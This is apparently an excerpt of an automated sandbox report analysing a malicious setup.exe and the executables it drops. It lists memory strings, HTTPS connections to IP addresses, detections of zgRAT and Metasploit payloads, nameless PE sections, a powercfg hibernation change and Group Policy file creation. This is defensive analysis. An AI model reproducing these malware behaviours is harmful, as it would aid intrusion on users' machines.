Source: 1719859269.0326595_setup.exe, 00000000.00000003.2247112284.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2234524182.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2221251318.0000021663831000.00000004.00000020.00020000.00000000.sdmp, 1719859269.0326595_setup.exe, 00000000.00000003.2265315437.0000021663831000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2429621536.0000000001D96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2429621536.0000000001D96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.instagram.com
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000A48000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2539866833.000000002F53C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000A48000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000B4A000.00000040.00000001.01000000.00000009.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000A48000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2539866833.000000002F53C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000B4A000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000A48000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://www.wondershare.com/company/end-user-license-agreement.html
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://www.wondershare.com/privacy.html
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2264754097.0000021663845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yastatic.net

Source: unknown	Network traffic detected: HTTP traffic on port 60418 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 60420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60414 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60424 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60410
Source: unknown	Network traffic detected: HTTP traffic on port 60433 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60410 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60389 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60418
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60417
Source: unknown	Network traffic detected: HTTP traffic on port 60437 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60414
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 60421 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60446 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60389
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60421
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60420
Source: unknown	Network traffic detected: HTTP traffic on port 60396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60426 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60401 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60428
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60426
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60424
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 60441 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60433
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60398
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60431
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60396
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60394
Source: unknown	Network traffic detected: HTTP traffic on port 60431 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60437
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60417 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 60444 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60444
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60428 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60441
Source: unknown	Network traffic detected: HTTP traffic on port 60398 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60404
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60446
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60401

Source: unknown	HTTPS traffic detected: 104.26.9.59:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.130.41.108:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.20.219:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.174.95.43:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.240.132.78:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.240.132.78:443 -> 192.168.2.6:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.3:443 -> 192.168.2.6:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.2:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.1:443 -> 192.168.2.6:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.6:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60389 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60396 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60398 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60401 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60404 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60410 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60414 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60417 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60418 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60420 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60421 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60424 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60426 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60428 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.210.117.250:443 -> 192.168.2.6:60431 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60433 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:60437 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.6:60441 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.210.117.250:443 -> 192.168.2.6:60446 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000000E.00000002.2560583044.000000C00023A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000E.00000002.2571364769.000000C000802000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

PE file contains section with special chars

Source: 1719859269.0326595_setup.exe	Static PE information: section name: .vmp<E
Source: 1719859269.0326595_setup.exe	Static PE information: section name: .vmp<E
Source: 1719859269.0326595_setup.exe	Static PE information: section name: .vmp<E
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: section name:
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: section name:
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: section name:
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: section name:
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe.0.dr	Static PE information: section name:
Source: ExtreamFanV5.exe.7.dr	Static PE information: section name:
Source: ExtreamFanV5.exe.7.dr	Static PE information: section name:
Source: ExtreamFanV5.exe.7.dr	Static PE information: section name:
Source: ExtreamFanV5.exe.7.dr	Static PE information: section name:
Source: ExtreamFanV5.exe.7.dr	Static PE information: section name:
Source: PowerExpertNT.exe.7.dr	Static PE information: section name:
Source: PowerExpertNT.exe.7.dr	Static PE information: section name:
Source: PowerExpertNT.exe.7.dr	Static PE information: section name:
Source: PowerExpertNT.exe.7.dr	Static PE information: section name:
Source: PowerExpertNT.exe.7.dr	Static PE information: section name:
Source: WinTrackerSP.exe.7.dr	Static PE information: section name:
Source: WinTrackerSP.exe.7.dr	Static PE information: section name:
Source: WinTrackerSP.exe.7.dr	Static PE information: section name:
Source: WinTrackerSP.exe.7.dr	Static PE information: section name:
Source: WinTrackerSP.exe.7.dr	Static PE information: section name:
Source: AAAAKJKJEB.exe.9.dr	Static PE information: section name:
Source: AAAAKJKJEB.exe.9.dr	Static PE information: section name: .idata
Source: AAAAKJKJEB.exe.9.dr	Static PE information: section name:
Source: amadka[1].exe.9.dr	Static PE information: section name:
Source: amadka[1].exe.9.dr	Static PE information: section name: .idata
Source: amadka[1].exe.9.dr	Static PE information: section name:

PE file has nameless sections

Source: super[1].exe.0.dr	Static PE information: section name:
Source: super[1].exe.0.dr	Static PE information: section name:
Source: super[1].exe.0.dr	Static PE information: section name:
Source: super[1].exe.0.dr	Static PE information: section name:
Source: super[1].exe.0.dr	Static PE information: section name:
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: section name:
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: section name:
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: section name:
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: section name:
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.0.dr	Static PE information: section name:

Uses powercfg.exe to modify the power settings

Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6663B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	9_2_6663B700
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	9_2_665DF280
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6663B8C0 rand_s,NtQueryVirtualMemory,	9_2_6663B8C0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6663B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	9_2_6663B910

Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe

Code function: 8_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

8_2_0040936C

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Windows\System32\GroupPolicy\gpt.ini	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Windows\System32\GroupPolicy\Machine	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Windows\System32\GroupPolicy\User	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_0067DAB0	7_2_0067DAB0
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_0067C830	7_2_0067C830
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_006A66D0	7_2_006A66D0
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_006A3720	7_2_006A3720
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_006A31F0	7_2_006A31F0
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Code function: 7_2_006A2F80	7_2_006A2F80
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Code function: 8_2_00408330	8_2_00408330
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665D35A0	9_2_665D35A0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66646E63	9_2_66646E63
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665F9E50	9_2_665F9E50
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665F4640	9_2_665F4640
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66622E4E	9_2_66622E4E
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665DC670	9_2_665DC670
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66613E50	9_2_66613E50
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66639E30	9_2_66639E30
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66625600	9_2_66625600
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66617E10	9_2_66617E10
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_666476E3	9_2_666476E3
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665DBEF0	9_2_665DBEF0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665EFEF0	9_2_665EFEF0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66634EA0	9_2_66634EA0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665F5E90	9_2_665F5E90
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6663E680	9_2_6663E680
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665E9F00	9_2_665E9F00
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66617710	9_2_66617710
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66606FF0	9_2_66606FF0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665DDFE0	9_2_665DDFE0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_666277A0	9_2_666277A0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665E5440	9_2_665E5440
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6664545C	9_2_6664545C
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6664542B	9_2_6664542B
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6664AC00	9_2_6664AC00
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66615C10	9_2_66615C10
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66622C10	9_2_66622C10
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665FD4D0	9_2_665FD4D0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66616CF0	9_2_66616CF0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665E64C0	9_2_665E64C0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665DD4E0	9_2_665DD4E0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_666334A0	9_2_666334A0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6663C4A0	9_2_6663C4A0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665E6C80	9_2_665E6C80
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665FED10	9_2_665FED10
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665EFD00	9_2_665EFD00
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66600512	9_2_66600512
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_666385F0	9_2_666385F0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66610DD0	9_2_66610DD0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66619A60	9_2_66619A60
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6661E2F0	9_2_6661E2F0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66618AC0	9_2_66618AC0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665F1AF0	9_2_665F1AF0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66604AA0	9_2_66604AA0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_66642AB0	9_2_66642AB0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665ECAB0	9_2_665ECAB0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6664BA90	9_2_6664BA90
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665D22A0	9_2_665D22A0
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665D5340	9_2_665D5340
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665EC370	9_2_665EC370
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6661D320	9_2_6661D320
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_666453C8	9_2_666453C8
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665DF380	9_2_665DF380
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665F8850	9_2_665F8850
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_665FD850	9_2_665FD850
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6661F070	9_2_6661F070
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6661B820	9_2_6661B820
